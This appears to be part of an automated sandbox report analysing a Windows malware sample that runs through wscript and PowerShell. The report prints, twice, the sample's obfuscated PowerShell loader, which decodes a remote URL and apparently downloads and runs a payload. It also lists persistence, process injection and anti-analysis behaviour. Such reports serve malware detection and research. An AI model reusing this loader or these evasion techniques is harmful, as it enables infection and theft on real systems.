          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. 
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. 
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BAB7958 push ebx; retf 7_2_00007FFD9BAB796A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BAB00BD pushad ; iretd 7_2_00007FFD9BAB00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB847BB push es; iretd 7_2_00007FFD9BB847BC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB84B35 push es; iretd 7_2_00007FFD9BB84B62
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB84EED push es; iretd 7_2_00007FFD9BB84F6A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB82AC5 push edx; retf 7_2_00007FFD9BB82AC6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB848F5 push es; iretd 7_2_00007FFD9BB848F6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB854CE push es; iretd 7_2_00007FFD9BB854CF
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04743AD9 push ebx; retf 10_2_04743ADA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_076508C2 push eax; mov dword ptr [esp], ecx 10_2_07650AC4
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B309AD push ecx; mov dword ptr [esp], ecx 15_2_23B309B6
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C209AD push ecx; mov dword ptr [esp], ecx 20_2_04C209B6
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009DB185 push esi; iretd 20_2_009DB186
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009DB2C0 push cs; iretd 20_2_009DB2C1
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009DB663 push cs; retf 20_2_009DB664
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E07EB push ecx; ret 20_2_009E07EC
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E0899 push ebx; iretd 20_2_009E089A
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E8A80 push esp; retf 20_2_009E8AAA
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E0D40 push esp; ret 20_2_009E0D57
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D1E18 push ebp; retf 20_2_009D1E1D
          Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D3E53 push es; ret 20_2_009D3E56
          Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD1C0 rdtsc 15_2_23BAD1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6358
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3472
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8534
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1185
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 361
          Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.4 %
          Source: C:\Windows\SysWOW64\clip.exe API coverage: 2.2 %
          Source: C:\Windows\System32\wscript.exe TID: 6744 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep count: 8534 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep count: 1185 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8104 Thread sleep count: 361 > 30
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
          Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation
          Source: wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: wscript.exe, 00000000.00000003.1738052606.00000271C231D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
          Source: wscript.exe, 00000000.00000002.1739125471.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737516212.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690318667.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691643848.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691509199.00000271C2005000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738992247.00000271C202C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735994815.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690992572.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735994815.00000271C202C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691643848.00000271C202C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000003.1738052606.00000271C231D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: wscript.exe, 00000000.00000003.1737953396.00000271C00DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\j[
          Source: powershell.exe, 00000007.00000002.2841422392.000001A9A48D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWko%SystemRoot%\system32\mswsock.dllGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntege
          Source: powershell.exe, 0000000A.00000002.2228572118.0000000008230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process queried: DebugPort
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD1C0 rdtsc 15_2_23BAD1C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0463D244 LdrInitializeThunk,LdrInitializeThunk,10_2_0463D244
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B533A5 mov eax, dword ptr fs:[00000030h] 15_2_23B533A5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h]15_2_23B452A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h]15_2_23B452A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h]15_2_23BF92A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov ecx, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h]15_2_23BC62A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC72A0 mov eax, dword ptr fs:[00000030h]15_2_23BC72A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC72A0 mov eax, dword ptr fs:[00000030h]15_2_23BC72A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C052E2 mov eax, dword ptr fs:[00000030h]15_2_23C052E2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6329E mov eax, dword ptr fs:[00000030h]15_2_23B6329E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6329E mov eax, dword ptr fs:[00000030h]15_2_23B6329E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6E284 mov eax, dword ptr fs:[00000030h]15_2_23B6E284
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6E284 mov eax, dword ptr fs:[00000030h]15_2_23B6E284
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h]15_2_23BB0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h]15_2_23BB0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h]15_2_23BB0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05283 mov eax, dword ptr fs:[00000030h]15_2_23C05283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF2F8 mov eax, dword ptr fs:[00000030h]15_2_23BEF2F8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B292FF mov eax, dword ptr fs:[00000030h]15_2_23B292FF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h]15_2_23BE12ED
